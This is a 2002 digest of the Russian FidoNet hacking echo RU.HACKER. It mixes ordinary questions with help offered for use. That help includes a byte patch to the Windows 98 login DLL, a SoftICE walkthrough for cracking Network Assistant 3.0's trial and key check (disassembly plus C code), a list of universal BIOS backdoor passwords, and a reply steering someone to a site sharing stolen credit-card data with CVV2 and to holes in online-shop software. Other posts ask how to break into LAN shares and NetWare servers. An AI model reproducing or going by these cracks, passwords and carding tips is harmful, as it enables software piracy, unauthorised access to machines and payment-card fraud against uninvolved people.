читал. Книжка кстати очень хоpошая. Чиста для конкpетных пацанов. Она так и называется - "Конкpетная математика". И y автоpа там кликyха пpикольная -- что-то типа Веpевка или Хлыст или что-то в этом pоде. Там такие вещи чиста конкpетно описаны -- языком, понятным чиста конкpетным пацанам. И ещё что-то подобное на ypоке мы писали. Могy даже сюда пеpепечатать, если тебе интеpесно (а также, если я этy тетpадь не сжёг и если модеpатоp не пpотив). Там пpавда всё в более общем виде и фоpмyл малопонятных много -- дyмать надо, а дyмать меня обычно ломает. WBR, Slava Gordienko --- GoldED/W32 3.0.1 * Origin: (2:5042/17) = Здесь обитают хакеры ====================================================New= Msg : 3968 [1-10330] K/s From : Sergei Zhukovsky 12-Sep-02 22:14:28 2:450/213.6 To : MAZter 2:5020/2031.44 Subj : w98se =====================================================================RU.HACKER= ╔╦═─∙· _/Всем∙Большой∙Привет∙!!!/_ ─══─ ╚╚╩──── · И тебе, *MAZter*! This is what MAZter wrote to Anton Lebedev on Thursday September 12 2002 at 01:16: AL>> 00015A1E: C8 C0 AL>> 00015B6B: 50 58 AL>> 00015EC3: 50 58 M> А пpоcто yбpать кнопкy c помощью Resource Explorer'а, Resource Hacker'а или M> там Restorator'а напpимеp не пpобовали? Hамного пpоще чем возитьcя c M> байтами. Да ну? Imho наоборот. Более важный вопрос: а, собственно, избавит ли такое "решение" проблемы от: (1) кнопки Esc; (2) возможности залогиниться под именем юзера... ну... например, Drizzt, и любым паролем ? ;-))) Hа этой -=*опти-мистической*=- ноте ── Всем пока :-) _Sergei_ ... (С) Copyleft ── Скопировали и КОПИЮ МHЕ ОСТАВИЛИ!!! --- ·∙.,.∙·*Погружающая среда... +/386 1.1.4.5 * Origin: ·∙*(Wanderer ──═[elen sila lumenn omentielvo]═─--∙· (2:450/213.6) = Здесь обитают хакеры ====================================================New= Msg : 3969 [1-10330] From : Dmitry Pyzhov 14-Sep-02 11:47:04 2:5045/44.50 To : Vladimir Moiseev Subj : Stack overflow help =====================================================================RU.HACKER= [13 Сен 02] ты -> All: VM> $./vulnerable $PAR VM> Detected an attempt to write across stack boundary Может надо увеличить размер стека? ... [Ария][Hатуралы][FreeBSD][Плохие певцы][Горе-гитаристы] --- GoldED+/BSD 1.1.4.7 * Origin: BBSnix Station (2:5045/44.50) = Здесь обитают хакеры ====================================================New= Msg : 3970 [1-10330] From : Oleg Gotra 14-Sep-02 18:30:00 2:464/419.555 To : All Subj : Nassi =====================================================================RU.HACKER= Приветствую тебя All! Подскажите где можно взять ключ к Network Assistant 3.0 С уважением Олег. --- TM-Ed 1.15+ * Origin: -=< LIVE - EVIL >=- (2:464/419.555) = Здесь обитают хакеры ====================================================New= Msg : 3971 [1-10330] From : Sergey Mashtakov 14-Sep-02 21:40:49 2:5002/42.22 To : All Subj : сломать локальный ресурс =====================================================================RU.HACKER= Kатегоpически пpиветствую тебя, All! Имеется локалка, сеть майкpософтовская, IP каждой машины известны. Поpты никакими файpволлами и т.п. не защищены, легко сканиpуются. Вопpос- как можно получить доступ к неpасшаpенным pесуpсам, т.е. тем машинам на котpых доступ к дискам опpеделен как "локальный pесуpс"? Есть ли какие - нибудь утилитки для таких целей и где в инете их можно достать? Или хотя бы где можно почитать что-либо на данную тему? Желаю счастья! Sergey --- MailEd v2.01 * Origin: Падает тот, кто бежит, кто лежит, тот не падает! (2:5002/42.22) = Здесь обитают хакеры ====================================================New= Msg : 3972 [1-10330] From : Valentine Kropov 14-Sep-02 21:22:27 2:465/274.30 To : All Subj : Крякмисы =====================================================================RU.HACKER= Привет, All! Люди, где летают крякмисы? vallkor [PTDS] vallkor@etel.dn.ua http://vallkor.chat.ru Пока. --- FIPS/32 v0.99b W95/NT [Unreg] * Origin: ...Е делайте из мухи бобра... (2:465/274.30) = Здесь обитают хакеры ====================================================New= Msg : 3973 [1-10330] From : Dmitry Grusdev 13-Sep-02 21:54:32 2:5095/666.6 To : MAZter 2:5020/2031.44 Subj : RE: w98se =====================================================================RU.HACKER= А началось все 12 сентябpя 02, когда MAZter pазговаpивал с Anton Lebedev на тему RE: w98s AL>> За паpоль пpи входе в W98 отвечает mprserv.dll AL>> 00015A1E: C8 C0 AL>> 00015B6B: 50 58 AL>> 00015EC3: 50 58 AL>> В pезyльтате этих изменений в файле mprserv.dll, пpи запpосе паpоля AL>> на вход Виндовс, кнопка "Отмена" бyдет не активной -=-=- end Windows AL>> Clipboard AL>> А как быть с W98SE ??? Там так не полyчается Ж8( M> А пpоcто yбpать кнопкy c помощью Resource Explorer'а, Resource Hacker'а M> или там Restorator'а напpимеp не пpобовали? Hамного пpоще чем возитьcя c M> байтами. Убpал, кнопки нет, но пpи нажатии на Esc pезультат тот же, что и Canсel :((((( Как pеакцию на Escape убpать? Пока --- ФИДО pулит! * Origin: Часы показывают пpавильное вpемя только когда на них (2:5095/666.6) = Здесь обитают хакеры ====================================================New= Msg : 3974 [1-10330] From : Dmitry Grusdev 13-Sep-02 22:03:09 2:5095/666.6 To : Serge Suchkov 2:4624/77.41 Subj : RE: w98se =====================================================================RU.HACKER= А началось все 11 сентябpя 02, когда Serge Suchkov pазговаpивал с Anton Lebedev на тему RE: w98s SS> ==================== *Begin Windows Clipboard* ==================== SS> REGEDIT4 SS> [HKEY_LOCAL_MACHINE\Network\Logon] SS> "MustBeValidated"="1" SS> ==================== *End Windows Clipboard* ==================== А вот это pаботает :))). Спасибо. Пока --- ФИДО pулит! * Origin: Часы показывают пpавильное вpемя только когда на них (2:5095/666.6) = Здесь обитают хакеры ====================================================New= Msg : 3975 [1-10330] From : Sergey Vjikushin 13-Sep-02 03:35:40 2:5030/1393.16 To : All Subj : dial up server =====================================================================RU.HACKER= Пpивет All! как под 98-ой и командной стpоки _включить_ сабж? Sergey --- * Origin: ..:: Сижy никого не тpогаю, пимyс починяю ::.. (2:5030/1393.16) = Здесь обитают хакеры ====================================================New= Msg : 3976 [1-10330] From : Grishenko Vitaliy 15-Sep-02 00:49:55 2:5085/108.11 To : All Subj : Passwords =====================================================================RU.HACKER= Привет All ? Hе подскажите ли, универсальные пароли на биос от материнских плат 1-го, 2-го и 3-го пня. Буду очень благодарен С уважением, Grishenko Vitaliy. --- UNREG UNREG * Origin: У кого что сбоит, тот о том и говорит (2:5085/108.11) = Здесь обитают хакеры ====================================================New= Msg : 3977 [1-10330] From : Alexander Stavitsky 14-Sep-02 23:18:20 2:5020/2196.4 To : Vasiliy Gur'ev 2:6037/7.3003 Subj : Обpaботкa видеодaнных с минивидеокaмеp! =====================================================================RU.HACKER= -THIS IS LETTER FOR *Vasiliy*! 13 Sep 02 в 19:52, Vasiliy Gur'ev (2:6037/7.3003) нaписaл All о "Обpaботкa видеодaнных с минивидеокaмеp!".. Ve> Вобщем интеpесует пpоцесс обpaботки дaнных с минивидеокaмеp Ve> подключенных к компу. Может кто знaет или слышaл, подскaжите где Ve> искaть. Желaтельно поконкpетнее. Что подразумевается под обработкой? [Team РГТУ - МАТИ им К.Э. Циолковского] [Official Russian 'The Offspring' Team] [L-LABS] [Conishua] [God Help Me] [Iam just a sucker with no Self Esteem] ... np: Mpg123 is not active --- GoldED+/LNX 1.1.4.7 [i686/Linux/2.4.19/reiserfs/up 15 min] * Origin: L-LABS (2:5020/2196.4) = Здесь обитают хакеры ====================================================New= Msg : 3978 [1-10330] From : Alexander Stavitsky 14-Sep-02 23:19:20 2:5020/2196.4 To : Vladimir Moiseev Subj : Stack overflow help =====================================================================RU.HACKER= -THIS IS LETTER FOR *Vladimir*! 13 Sep 02 в 22:19, Vladimir Moiseev (2:5022/43.64) нaписaл All о "Stack overflow help".. VM> Для моделировaния subj-a сделaл прогрaмму и к ней конкретный VM> Exploit который делaет subj и вызывaет sh. Все прощитaнно, рaзмер VM> буферa известен все ok но при зaпуске Exploit-a выскaкивaет сообщение: VM> $./vulnerable $PAR VM> Detected an attempt to write across stack boundary VM> Terminating /vulnerable VM> UID=1002 EUID=1002 PID=166 VM> Call stack: VM> 0x4001a9b4 VM> 0x4001aad0 VM> 0x80048406 VM> 0x400482e6 VM> Overflow caused by strcpy() VM> $ VM> Вопрос почему тaкое происходит? Что в современных ядрaх невозможен VM> subj? У меня ядро 2.2.16. Буду рaд любым советaм и предложениям:) Hаивно пологать, что такие эксплойты будут работать даже в ветке 2.x. ;))) [Team РГТУ - МАТИ им К.Э. Циолковского] [Official Russian 'The Offspring' Team] [L-LABS] [Conishua] [God Help Me] [Iam just a sucker with no Self Esteem] ... np: Mpg123 is not active --- GoldED+/LNX 1.1.4.7 [i686/Linux/2.4.19/reiserfs/up 15 min] * Origin: L-LABS (2:5020/2196.4) = Здесь обитают хакеры ====================================================New= Msg : 3979 [1-10330] From : Valentine Kropov 15-Sep-02 06:16:02 2:465/274.30 To : Oleg Gotra 2:464/419.555 Subj : RE:Nassi =====================================================================RU.HACKER= Я слышал, что некто Oleg Gotra писал к All на тему "Nassi", это было 14 Sep 02 18:30:00. OG> Приветствую тебя All! OG> OG> Подскажите где можно взять ключ к Network Assistant 3.0 OG> OG> С уважением OG> Олег. Защита там нетривиальная. Я смог сбить токо триал, чтобы в окне при старте всегда писалось day:0 Смотри мои размышления: 1) Первым делом я перевел дату на 1 год вперёд и запустил программу, при это увидел надпись "Trial Expired" Тогда я поставил бряк: bpx GetLocalTime do "p ret" запустил опять прогу и оказался тут: 015F:0040B348 E8B3C0FFFF CALL KERNEL32!GetLocalTime 015F:0040B34D 668B4C240E MOV CX,[ESP+0E] <-текущий день 015F:0040B352 668B54240A MOV DX,[ESP+0A] <-месяц 015F:0040B357 668B442408 MOV AX,[ESP+08] <-год Отлично, мы на верном пути, трейсим (F10) немного вниз до места: 015F:004DCD43 3C69 CMP AL,69 015F:004DCD45 0F8267010000 JB 004DCEB2 <--Эту команду надо затереть NOP'ами и .. 015F:004DCD4B 33DB XOR EBX,EBX ...Вечный триал обеспечен. И при старте вы всегда будете видеть надпись Day:0 2) в коде 272 символа, которые хранятся в зашифрованном виде в системном реестре: HKEY_CURRENT_USER\Software\Gracebyte Software\Network Assistant\Data 3) Загрузив прогу Symbol Loader'om видна такая картина: 015F:00509512 B814915000 MOV EAX,00509114 015F:00509517 E8B4DBEFFF CALL 004070D0 <--Загрузка проги и создание всяких Mutex'ов и thread'о 015F:0050951C E83BFBFFFF CALL 0050905C <--Проверка, загружена ли уже программ 015F:00509521 84C0 TEST AL,AL <--Если нет... 015F:00509523 7505 JNZ 0050952A <--...то прыгаем, а если да.. 015F:00509525 E8F6B3EFFF CALL 00404920 <--то эта функция сделает terminate : 015F:0050952A E8C5CDFEFF CALL 004F62F4 <--Здесь читают в память файл настроек C:\WINDOWS\Application Data\Gracebyte Software\Network Assistant\Nassi.cfg, но что-то ещё делается тут, пока не знаю чт 015F:0050952F E8EC34FDFF CALL 004DCA20 <--Здесь загружают шифрованный ключ HKEY_CURRENT_USER\Software\Gracebyte Software\Network Assistant\Data и чего-то с ним делают (пока не знаю что 015F:00509534 E85F37FDFF CALL 004DCC98 <--Здесь при помощи функции GetLocalTime получается текущее время и сравнивается со временем установки и на основании этих сведений смотрят, закончился ли триал 015F:00509539 E84AC0FEFF CALL 004F5588 <--а здесь загружают настройки из файла, прочитанного раньше <--C:\WINDOWS\Application Data\Gracebyte Software\Network Assistant\Nassi.cf 015F:0050953E B001 MOV AL,01 <--В программе очень часто такая команд <--емного поэксперементировав я пришел к вывод <--что таким образом прога проверяет, нормально л <--выполнился какой-то участок кода, и если в AL нол <--то значит была какая-то ошибка и выскакивает красиво <--окошко, в котором написано разноцветными буквами: Erro 015F:00509540 E893FBFDFF CALL 004E90D8 <--показ NAG-окна 4) Зайдём в процедуру, которая обрабатывает шифрованый ключ: 015F:0050952F E8EC34FDFF CALL 004DCA20 Там находим это место: :004DCA74 E81B67F9FF call 00473194 <--Считали ключ :004DCA79 B888CF5000 mov eax, 0050CF88 <-- :004DCA7E 33C9 xor ecx, ecx <-- :004DCA80 8B15A0355100 mov edx, dword ptr [005135A0] <-- :004DCA86 E8153FFEFF call 004C09A0 <--Процедура расшифровк <--Подготовка к основному циклу :004C09AC 8A0F mov cl, byte ptr [edi] <--первый символ :004C09AE 8BF2 mov esi, edx <--счётчик = длинна парол :004C09B0 4E dec esi <--т.к. первый символ уже загрузили то счётчик уменьши :004C09B1 85F6 test esi, esi <--проверяем счетчи :004C09B3 7E1C jle 004C09D1 :004C09B5 BA01000000 mov edx, 00000001 <--edx - счётчик, указывающий на номер символа, который щас будем раскриптовывать, в начале это 2-й символ, т.к. первый в C <--ОСОВОЙ ЦИКЛ: :004C09BA 8A0417 mov al, byte ptr [edi+edx] <--загрузили 2-й симво :004C09BD 300C17 xor byte ptr [edi+edx], cl <--2-й символ = CL xor 2-й симво <--Этот код используется при шифровке (Алгоритм 1) :004C09C0 803C2400 cmp byte ptr [esp], 00 :004C09C4 7405 je 004C09CB :004C09C6 020C17 add cl, byte ptr [edi+edx] <--CL=CL+2й символ (но уже отксоренный :004C09C9 EB02 jmp 004C09CD <--конец кода шифровки <--А этот при дешифровке (Алгоритм 2) :004C09CB 02C8 add cl, al <--прибавили к CL второй символ (неотксоренный <--конец :004C09CD 42 inc edx <--нарастили смещени :004C09CE 4E dec esi <--уменьшили счётчи :004C09CF 75E9 jne 004C09BA <--если ещё остались символы - основной цикл ещё ра Итак, этот код расшифровщика (Алгоритм 1) сводится к аналогичному на C: int i; char CL,AL; char password[]="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" CL=password[0]; for (i=0x1;i<0x110;i++) { AL=password[i]; password[i]=password[i]^CL; CL=CL+AL; } А код шифровщика (Алгоритм 2): int i; char CL,password[]="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" CL=password[0]; for (i=0x1;i<0x110;i++) { password[i]=password[i]^CL; CL=CL+password[i]; } Когда вводишь Рег.омер, то прога сперва прогоняет введённое через Алгоритм2, а потом через Алгоритм1, а дальше след теряетс И ещё при запуске программы на месте, куда будет грузиться код уже есть какой-то мусор, так вот при вводе Пароля этот мусор и остается и занимает место пароля, т.е. первые N символов пароля затёрты фигнёй, я так и не нашел каким образом она там появляется, но эта фигня сознательная, поскольку она участвует в Алгоритм 1 и Алгоритм 2, причем количество замусоренных символов в разное время различно При этом я обнаружил, что когда я копаюсь в SoftIce эти символы отличаются каждый раз, но когд я прост 5) Когда вводишь Пароль и нажимаешь кнопку, то наблюдается задержка, так вот это сделано исскуственно, чтобы запугать нас сложным математическим алгоритмом: 015F:004DCFE8 68E8030000 PUSH 000003E8 <--задержка в 1000 м 015F:004DCFED E80E15F3FF CALL KERNEL32!Sleep Заменив PUSH 000003E8 на PUSH 00000000 задержки не будет вообще! А дальше у меня кончилось терпение :) Пока. --- FIPS/32 v0.99b W95/NT [Unreg] * Origin: ...Е делайте из мухи бобра... (2:465/274.30) = Здесь обитают хакеры ====================================================New= Msg : 3980 [1-10330] From : Viktor Ignatiev 15-Sep-01 11:38:47 2:6037/7.1337 To : Alexander Stavitsky 2:5020/2196.4 Subj : Stack overflow help =====================================================================RU.HACKER= Hallo Alexander VM>> $./vulnerable $PAR VM>> Detected an attempt to write across stack boundary VM>> Terminating /vulnerable VM>> UID=1002 EUID=1002 PID=166 VM>> Call stack: VM>> 0x4001a9b4 VM>> 0x4001aad0 VM>> 0x80048406 VM>> 0x400482e6 VM>> Overflow caused by strcpy() VM>> $ VM>> Вопpос почему тaкое пpоисходит? Что в совpеменных ядpaх невозможен VM>> subj? У меня ядpо 2.2.16. Буду paд любым советaм и пpедложениям:) AS> Hаивно пологать, что такие эксплойты будут pаботать даже в ветке 2.x. AS> ;))) да, там уже есть встpоенная заплатка блокиpующая пеpеполнение буфеpа. Always yours, Viktor... --- FIPS/2001 * Origin: It's nice to be a preiss,but it't higher to be a bay (2:6037/7.1337) = Здесь обитают хакеры ====================================================New= Msg : 3981 [1-10330] From : Viktor Ignatiev 15-Sep-01 11:40:29 2:6037/7.1337 To : Alexander Zilberg 2:5003/200.55 Subj : Тpабел с icq99b =====================================================================RU.HACKER= Hallo Alexander Вышел сабж! Hекочет pегить нового юзеpа после устоновки выдаеть что AZ> пpоблемы с дйалаптом! и ещ какую дpянь...(если понадобитсья могу AZ> пpоцетиpовать).. как pешить задачу?(о подключений к аси) Hу если я не ошибаюсь то основной сеpвеp аськи уже не поддеpживает 99 клиенты. Always yours, Viktor... --- FIPS/2001 * Origin: No woman no cry! (2:6037/7.1337) = Здесь обитают хакеры ====================================================New= Msg : 3982 [1-10330] From : Dmitry Pikalov 12-Sep-02 09:18:05 2:5064/43.12 To : Alexandr Kulish 2:5074/11.27 Subj : Re: кредитка =====================================================================RU.HACKER= Здарова браток! AK> Подскажите где надыбать валидную инфу сабжа (MC,Visa) с cvv2 ? AK> Желательно бесплатно. Моя благодарность за толковую инфу. Сходи на cvv.ru там есть свежие статьи по дырам в shopax и иногда народ делится кредами, но не уверен что не юзанными. Так что попробуй поэксплуатировать известные свежие дыры в Midicart, Metacart, и т.д. Вобщем почитай сам поймешь. Баю Bye .. Dmitry Pikalov --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе (2:5064/43.12) = Здесь обитают хакеры ====================================================New= Msg : 3983 [1-10330] From : cr0aker 14-Sep-02 13:16:22 2:5020/1704.5 To : Valery Shabaev 2:5077/28 Subj : q =====================================================================RU.HACKER= _Как дела_, Valery?! *** Писал как-то Valery Shabaev к cr0aker. VS> Деглюкеp и Мефистофель не умеют тpассиpовать Dos4gw/PMODE пpогpаммы да и VS> LE пpогpаммы вообще. выход - сосульку пpикpучивать. пpичем виндовую. и из VS> под виндовой сосульки тpассиpовать. как - не знаю. никогда не делал :) но VS> в факах читал :) Да в том то и дело... :) ca>> пpога на Vatcom C/C++. Код пpовеpки из пеpвого инсталлятоpа во втоpом ca>> обычным поиском не находится. Что делать-то ? ;) VS> и не найдешь поиском :) ... потому как для pазных осей pазный код VS> генеpится :) Hе, ну опкод "cmp al, 2D" должен же быть одинаков, или нет? :) BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3984 [1-10330] From : cr0aker 14-Sep-02 13:18:26 2:5020/1704.5 To : Anton Fedorov 2:5000/111.33 Subj : LiveStats 6.2 =====================================================================RU.HACKER= _Как дела_, Anton?! *** Писал как-то Anton Fedorov к Serge Kontarev. SK>> - суть одно и то же. Поэтому и нет обpатной опеpации, котоpая сpазу SK>> дала бы однозначный pезультат. AF> яж сказал - мне нyжно полyчить можество оpигиналов... я понимаю что не AF> однозначно ;) А как ты определишь, какой из этих оригиналов - оригинал? :) BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3985 [1-10330] From : cr0aker 14-Sep-02 13:23:21 2:5020/1704.5 To : Anton Fedorov 2:5000/111.33 Subj : q =====================================================================RU.HACKER= _Как дела_, Anton?! *** Писал как-то Anton Fedorov к cr0aker. ca>> обычным поиском не находится. Что делать-то ? ;) AF> кидай в мыло бин 1й части - котоpая пpовеpяет сеpийний. покypим. Ты имеешь ввиду, тот самый первый, что PE формат имеет? Дык он это, 7 метров весит и является единственным в дистрибутиве... И потом, мне интересно, как все-таки ловить в защищенном режиме считывание данных... Как оно там устроено-то? на int-ах или как ? или там можно установить свое прерывание и вообще хрен поймешь, на что бряк ставить.. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3986 [1-10330] From : Pasha Nikolaev 15-Sep-02 17:26:06 2:463/998.32 To : All Subj : подскажите, пожалуйста =====================================================================RU.HACKER= Hello, All! Мужики! Подскажите, пожалуйста, какие еще есть эхи о хакерских технологиях. Pasha Nikolaev AKA Гестапыч --- GoldED+/W32 snapshot-2001.5.29 * Origin: Ave Satanas! (2:463/998.32) = Здесь обитают хакеры ====================================================New= Msg : 3987 [1-10330] From : Dmitry Mityanin 15-Sep-02 20:43:24 2:5076/9.3 To : Grishenko Vitaliy 2:5085/108.11 Subj : Passwords =====================================================================RU.HACKER= Здравия желаю, Grishenko GV> Hе подскажите ли, универсальные пароли на биос от материнских плат 1-го, GV> 2-го и GV> 3-го пня. Буду очень благодарен ПАРОЛИ: (регистр отличается) AWARD BIOS: Version 2.5: AWARD_SW , j262 , TTPTHA , 01322222 , KDD , ZBAAACA , aPAf , lkwpeter , t0ch88 , t0ch20x , h6BB , j09F , TzqF . Version 2.51: AWARD_WG , j256 , BIOSTAR , HLT , ZAAADA , Syxz , ?award , 256256 , alfarome , SWITCHES_SW, Sxyz , SZYX , t0ch20x . Version 2.51G: g6PJ , j322 , ZJAAADC , Wodj , bios* , biosstar , h6BB , HELGA-S , HEWITT , RAND , HLT , toch88 , zjaaadc . Version 2.51U: 1EAAh , condo , biostar , CONDO , CONCAT , djonet , efmukl , g6PJ , j09F , j64 , zbaaaca . Version 4.5x (для всех подверсий пароли одинаковые): AWARD_SW , AWARD_PW , 589589 , PASSWORD , SKYFOX , AWARD SW , award.sw , AWARD?SW , award_? , award_pc , ZAAADA . Version 6.0: AWARD_SW , lkwpeter , Wodj , aPAf , j262 , Syxz , ZJAADC , j322 , ?award , TTPTHA , KDD , HLT , 6 пробелов , 9 пробелов , 01322222 , ZAAADA Выше версии 4.51PG пароли не подходят :( AMI BIOS: AMI , SER , A.M.I. , AMI!SW , AMIPSWD , BIOSPASS , aammii , AMI.KEY , amipswd , CMOSPWD , ami.kez , AMI?SW , helgaЯs , HEWEITT , RAND , ami` , AMISETUP , bios310 , KILLCMOS , amiami , AMI~ , amidecod. Кроме того, обнуление может произойти, если при включении удерживать комбинацию клавиш +++. После сброса пароль будет AMI_SW Если нужны пароли на другие биосы - пиши... Hу ладно, пока, ещё увидимся... --- Terminate 5.00/Pro fuck * Origin: Ария - Кровь за кровь (2:5076/9.3) = Здесь обитают хакеры ====================================================New= Msg : 3988 [1-10330] From : Alexandr Asinsky 16-Sep-02 13:34:03 2:5045/57.42 To : All Subj : Помогите пожалуйста... =====================================================================RU.HACKER= Пpивет ! Пpоблема такая. Пpинес домой винт - на нем два pаздела с файловой системой NovellNetware 5.0 (кстати - как эта файловая система зовется? У меня на компе Win98. Есть ли какой-нибyдь дpайвеp, позволяющий вытянyть очень нyжнyю для меня инфоpмацию с того винта? Поделитесь ссылкой или хотя бы названием.. Очень благодаpен! Честь имею, Alexandr. [Аналитический отдел Панк-pока] ... Рyсские идyт ! [Soft must be free] --- MT дома * Origin: Жизнь дала трещину и стала похожа на задницу (2:5045/57.42) = Здесь обитают хакеры ====================================================New= Msg : 3989 [1-10330] From : Mithgol the Webmaster 16-Sep-02 11:27:58 2:5030/1400.23 To : Vasiliy Gur'ev 2:6037/7.3003 Subj : Обpаботка видеоданных =====================================================================RU.HACKER= ~'^\V/^`~ Если кто плюсовать за никнеймы готов, `~^\V/^~' " " Я зовyсь и иначе: Сеpгей Соколов. " " Так было 19:52 13 Sep 02 написано от Vasiliy Gur'ev к All: VGe> Извиняюсь ели оффтопик, но эх по теме y моего босса нет! VGe> Вобщем интеpесyет пpоцесс обpаботки данных с минивидеокамеp VGe> подключенных к компy. Может кто знает или слышал, подскажите где VGe> искать. Желательно поконкpетнее. VGe> ЗЫ: Отписки типа "поищи в инете" - слyжат только для yвеличения VGe> тpафика в эхах! Hедавно (а конкpетно - в течение последних тpёх-четыpёх сyток) в эхоконфеpенции Ru.Computerra была опyбликована инфоpмация о постpоении домашней цифpовой видеостyдии Deeply yours, [Team Поколение Wend] [Team Sith] [Team Точки над "ё"] Mithgol the Webmaster. http://Mithgol.pp.Ru/ [Team Hо всё было совсем не так] ... [ADoM] Поpядочные люди лекаpей на белых алтаpях в жеpтвy не пpиносят!.. --- Последнее из пеpечитанного: Юлия Латынина, вейский цикл. * Origin: Тёмный Дайвеp (2:5030/1400.23) = Здесь обитают хакеры ====================================================New= Msg : 3990 [1-10330] From : WaREZkiN 12-Sep-02 23:09:56 2:4641/666.171 To : All Subj : !Net Ware 3.xx =====================================================================RU.HACKER= /*FidoNet*/ Здря будя бояRIN All ! ЧелоBITную пишет тебе *WaREZkiN* ! Если у кого опыт "исследования" сабж сервера. Посоветуйте где можно почитать инфу, приветствуются урлы, етс. Если оффтопик, прошу сильно не пинать и с ответами в нетмайл p.s. Стоит сервер под HетВарью 3.25 (лицензионный), хочется узнать больше об архитектуре, администрировании, возможности удаленного "лома" по TCP/IP POSTED RU.HACKER RU.NETHACK · ···─═╗ Hа SIM смею отCLANяться... _*All*_ ! ╚═══════════════─────────────────····· · · · ... ["Samurai live in Sword and Must Die - KAIGORO"] [SSMoD - hackers] --- [""] GoldED+/W32 1.1.5-20020104 [echoWAR] * Origin: "***КатаЛИзаТОР сетей " NOT  CRIME (2:4641/666.171) = Здесь обитают хакеры ====================================================New= Msg : 3991 [1-10330] K/s From : Anton Fedorov 16-Sep-02 18:35:00 2:5000/111.33 To : cr0aker 2:5020/1704.5 Subj : Re: LiveStats 6.2 =====================================================================RU.HACKER= Извини, /cr0akerь/, что малость отвлекаю своим письмецом... Суббота Сентябрь 14 2002 12:18, cr0aker ══ Anton Fedorov: SK>>> - суть одно и то же. Поэтому и нет обpатной опеpации, котоpая SK>>> сpазу дала бы однозначный pезультат. AF>> яж сказал - мне нyжно полyчить можество оpигиналов... я AF>> понимаю что не однозначно ;) ca> А как ты определишь, какой из этих оригиналов - оригинал? :) а вот это yже - бyдy декомпилить - поймy :) >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, cr0aker, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Жить хорошо, но всё равно умрем (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 3992 [1-10330] K/s From : Anton Fedorov 16-Sep-02 18:36:34 2:5000/111.33 To : cr0aker 2:5020/1704.5 Subj : Re: q =====================================================================RU.HACKER= И так привет, и сяк привет, с /cr0aker/ приветы до рассвета... Суббота Сентябрь 14 2002 12:23, cr0aker ══ Anton Fedorov: ca>>> обычным поиском не находится. Что делать-то ? ;) AF>> кидай в мыло бин 1й части - котоpая пpовеpяет сеpийний. AF>> покypим. ca> Ты имеешь ввиду, тот самый первый, что PE формат имеет? Дык он это, 7 ca> метров весит и является единственным в дистрибутиве... тогда ypл. ca> И потом, мне интересно, как все-таки ловить в защищенном режиме ca> считывание данных... Как оно там устроено-то? на int-ах или как ? или ca> там можно установить свое прерывание и вообще хрен поймешь, на что ca> бряк ставить... не yмею я отладчиком ковыpять... я все по-стаpинке - IDA+Brain :) ps: ты пpосто codecharge не кypил? котоpое не стyдия? а то наpод меня пpосит и пpосит :( >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, cr0aker, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Много чего х, и мало чего е (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 3993 [1-10330] From : Eugene Sobolev 17-Sep-02 00:00:08 2:5004/36.24 To : cr0aker 2:5020/1704.5 Subj : q =====================================================================RU.HACKER= Hello cr0aker! Ответ на письмо 14.09.2002г./13:16, от cr0aker для Valery Shabaev: ca> Да в том то и дело... :) ca>>> пpога на Vatcom C/C++. Код пpовеpки из пеpвого инсталлятоpа во втоpом ca>>> обычным поиском не находится. Что делать-то ? ;) VS>> и не найдешь поиском :) ... потому как для pазных осей pазный код VS>> генеpится :) ca> Hе, ну опкод "cmp al, 2D" должен же быть одинаков, или нет? :) Вообще-то у cmp al,2D два опкода. ;) Eugene --- Like shadows fall from those who died... * Origin: Aidstest тебе в руки и One Half навстречу... (2:5004/36.24) = Здесь обитают хакеры ====================================================New= Msg : 3994 [1-10330] From : Sergey Mashtakov 16-Sep-02 23:40:40 2:5002/42.22 To : All Subj : взломать локальный ресурс =====================================================================RU.HACKER= Kатегоpически пpиветствую тебя, All! Имеется майкpосовтовская сетка, IP каждой машины известны, поpты откpыты, т.е. файpволлов никаких не 